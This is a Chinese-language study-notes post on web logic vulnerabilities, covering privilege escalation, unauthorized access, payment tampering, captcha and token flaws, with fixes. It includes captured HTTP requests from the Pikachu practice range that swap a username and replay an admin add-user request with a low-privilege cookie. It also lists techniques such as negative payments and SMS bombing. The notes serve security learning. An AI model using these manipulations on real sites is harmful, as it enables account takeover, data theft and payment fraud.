web逻辑漏洞

越权漏洞
浏览器对用户的提交数据请求没有经过严格的权限设置,导致用户可以拥有观察或更改其他用户信息的功能,
通过ID之类的身份之类的身份标识,从而使a账号获取b账号的
数据等,或者使用低权限用户身份的账号,发送高权限账号才可以有的请求。获取的高权限的操作
通过删除请求中的认证信息后重放该请求,依旧可以访问或者完成操作

越权分为两种
水平越权:用户在权限想同等级下的组,可以进行越权访问,修改,删除数据相同的普通用户可以看到其他普通用户里面的数据。

垂直越权:用户在不同权限下的组,可以进行高级别的权限使用。
比如普通用户可以浏览到特权用户才能看到的页面

防御
前端和后端对用户输入的信息进行校验,双重验证机制
调用功能的验证用户是否有权限调用相关功能
执行关键操作前必须验证用户身份,验证用户是否具备操作数据的权限
敏感/关键接口的读写增加 session鉴权。
对交易参数进行签名校验,防止用户篡改。
开发者尽可能多的考虑用户的反常行为和输入。

皮卡丘靶场水平越权
登录一个用户抓包,更改其他用户名得到其他用户的信息

GET /pikachu-master/vul/overpermission/op1/op1_mem.php?username=lucy&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF HTTP/1.1

Host: 192.168.11.12

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://192.168.11.12/pikachu-master/vul/overpermission/op1/op1_mem.php

Connection: close

Cookie: PHPSESSID=b36ho72qn2p0f38qpjutnmu3g7

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

垂直越权
先使用admin账号添加用户抓包,退出进入pikachu账号浏览器抓包获取cookice,把cookice放到第一个包发送添加用户成功

Cookie: PHPSESSID=j6va1sivknpkctcunk7si1rds5

POST /pikachu-master/vul/overpermission/op2/op2_admin_edit.php HTTP/1.1

Host: 192.168.11.12

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 88

Origin: http://192.168.11.12

Connection: close

Referer: http://192.168.11.12/pikachu-master/vul/overpermission/op2/op2_admin_edit.php

Cookie: PHPSESSID=j6va1sivknpkctcunk7si1rds5

Upgrade-Insecure-Requests: 1



username=123qweqaz&password=qaz&sex=&phonenum=&email=&address=&submit=%E5%88%9B%E5%BB%BA

未授权访问漏洞
未授权访问指的是指用户在没有通过认证授权的情况下能够直接访问需要通过认证才能访问的页面或者文本信息,可以尝试在登录某网站前台或后台之后,将相关的页面链接复制到其他浏览器或其他电脑上进行访问,观察是否能访问成功,
未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷
导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露,

漏洞检测
登录某应用访问需要通过认证的页面,切换浏览器再次访问此页面,成功访问则存在
未授权访问漏洞

漏洞修复
对未授权访问页面做sess认证,并且用户访问的每一个URL做身份鉴别,
正确地校验用户ID和token等

WEB漏洞-逻辑漏洞之登录脆弱及支付篡改
登录功能点,检测,危害,修复方案
1,登录暴力破解
2,http/https传输
3,cookice脆弱点
4,session固定点传输
5,密文验证

数据篡改安全问题
商品购买数量
选择商品和数量-选择支付及配送方式-生成订单编号-订单支付选择-完成支付

常见篡改参数
常见编号ID,购买价格,购买数量,支付方式,订单号,支付状态,

常见修改方式
替换支付,重复支付,最小额支付,负数支付,溢出支付,优惠价支付。

操作步骤
HTTP/HTTPS协议密文抓取
后台登录账号爆破测试
cookice脆弱点验证修改测试
某商城系统商品支付逻辑测试数量,订单
某建站系统商品支付逻辑测试价格,订单

WEB漏洞-逻辑漏洞之找回机制及接口安全
找回重置机制
客服端回显,response状态值,验证码爆破,找回流程
接口调用乱用

WEB漏洞-逻辑越权之验证码与Token接口
验证码安全
分类:图片,手机或邮箱,语音,视频,操作
原理:验证码生成或验证过程中有逻辑问题
危害:账户权限泄露,短信轰炸,遍历,任意用户操作
漏洞:客服端回显,验证码复用,验证码爆破,绕过

Token安全
token爆破,token客服端回显等

验证码识别插件工具使用
captcha-killer使用
pkav-Http-fuzz,reCAPTCHA等

接口安全问题
调用,遍历,未授权,篡改
调用案例:短信轰炸
遍历案例:UID等遍历
callback回调:JSONP

个人学习笔记,如有不对请各位大佬指出

你可能感兴趣的:(安全,web安全,渗透测试,渗透)